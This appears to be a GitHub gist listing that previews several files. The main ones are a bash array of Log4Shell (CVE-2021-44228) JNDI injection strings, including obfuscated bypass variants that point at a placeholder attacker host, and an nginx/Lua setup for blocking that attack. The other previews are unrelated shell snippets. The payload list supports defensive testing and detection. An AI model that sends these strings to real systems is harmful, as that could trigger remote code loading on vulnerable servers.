This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
declare -a PATTERNS=() | |
PATTERNS+=('${jndi:ldap:attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${j${k8s:k5:-ND}i${sd:k5:-:}}') | |
PATTERNS+=('${j${main:\k5:-Nd}i${spring:k5:-:}}') | |
PATTERNS+=('${j${sys:k5:-nD}${lower:i${web:k5:-:}}}') | |
PATTERNS+=('${j${::-nD}i${::-:}}') | |
PATTERNS+=('${j${EnV:K5:-nD}i:}') | |
PATTERNS+=('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${j${loWer:Nd}i${uPper::}}') | |
PATTERNS+=('${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker_controled_website/payload_to_be_executed }') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- -*- location: /etc/nginx/conf.d/cve_2021_44228.lua; -*- | |
-- -*- mode: lua; -*- | |
-- -*- author: John H Patton; -*- | |
-- -*- email: jhpattonconsulting@gmail.com; -*- | |
-- -*- license: MIT License; -*- | |
-- | |
-- Copyright 2021 JH Patton Consulting, LLC | |
-- | |
-- Permission is hereby granted, free of charge, to any person obtaining a copy of this | |
-- software and associated documentation files (the "Software"), to deal in the Software |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- -*- location: /etc/nginx/conf.d/cve_2021_44228.lua; -*- | |
-- -*- mode: lua; -*- | |
-- -*- author: John H Patton; -*- | |
-- -*- email: jhpattonconsulting@gmail.com; -*- | |
-- -*- license: MIT License; -*- | |
-- | |
-- Copyright 2021 JH Patton Consulting, LLC | |
-- | |
-- Permission is hereby granted, free of charge, to any person obtaining a copy of this | |
-- software and associated documentation files (the "Software"), to deal in the Software |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# /etc/nginx/conf.d/default.conf | |
server { | |
listen 80 default_server; | |
server_name localhost; | |
set $captured_request_headers ""; | |
set $captured_request_body ""; | |
set $cve_2021_44228_log ""; | |
rewrite_by_lua_block { | |
cve_2021_44228.block_cve_2021_44228() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# /etc/nginx/conf.d/lua.conf | |
# GLOBAL LUA -- HTTP BLOCK LEVEL | |
# Lua locations | |
# $prefix is the server prefix ( -p {server_prefix} ) passed in | |
# to nginx at startup, or the default build prefix (/etc/nginx/). | |
lua_package_path "${prefix}conf.d/?.lua;/usr/local/lib/lua/?.lua;;"; | |
lua_package_cpath "/usr/lib64/lua/5.1/?.so;;"; | |
# Disable logging cosocket lua TCP socket read timeout. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# /etc/nginx/nginx.conf | |
# nginx plus implementation for RHEL hosts | |
load_module modules/ndk_http_module.so; | |
load_module modules/ngx_http_lua_module.so; | |
error_log /var/log/nginx/error.log error; | |
pid /var/run/nginx.pid; | |
lock_file /var/lock/nginx.lock; | |
worker_processes auto; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# To get the most out of this .bashrc, install bash 4.x or higher along with the following tools: | |
# figlet | |
# screenfetch | |
# | |
# On Mac, install bash via brew and update the shell for the user: | |
# | |
# brew install bash | |
# sudo echo /usr/local/bin/bash >> /etc/shells | |
# chsh -s /usr/local/bin/bash | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# Create the CA root signing key | |
openssl genrsa -out "./ca.key" 2048 | |
# Create the CA root certificate | |
openssl req -x509 -new -nodes \ | |
-days 3650 \ | |
-reqexts v3_req \ | |
-extensions v3_ca \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
get_bg_color() { | |
local -n bg_color="$1" | |
local ansi_sequence_query_bg='\e]11;?\e\' | |
local cur_stty=$(stty -g) | |
# enable stty raw echo | |
stty raw -echo min 0 time 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
get_bg_color() { | |
local -n bg_color="$1" | |
local ansi_sequence_query_bg='\e]11;?\e\' | |
local cur_stty=$(stty -g) | |
stty raw -echo min 0 time 0 | |
printf "%b" "${ansi_sequence_query_bg}" |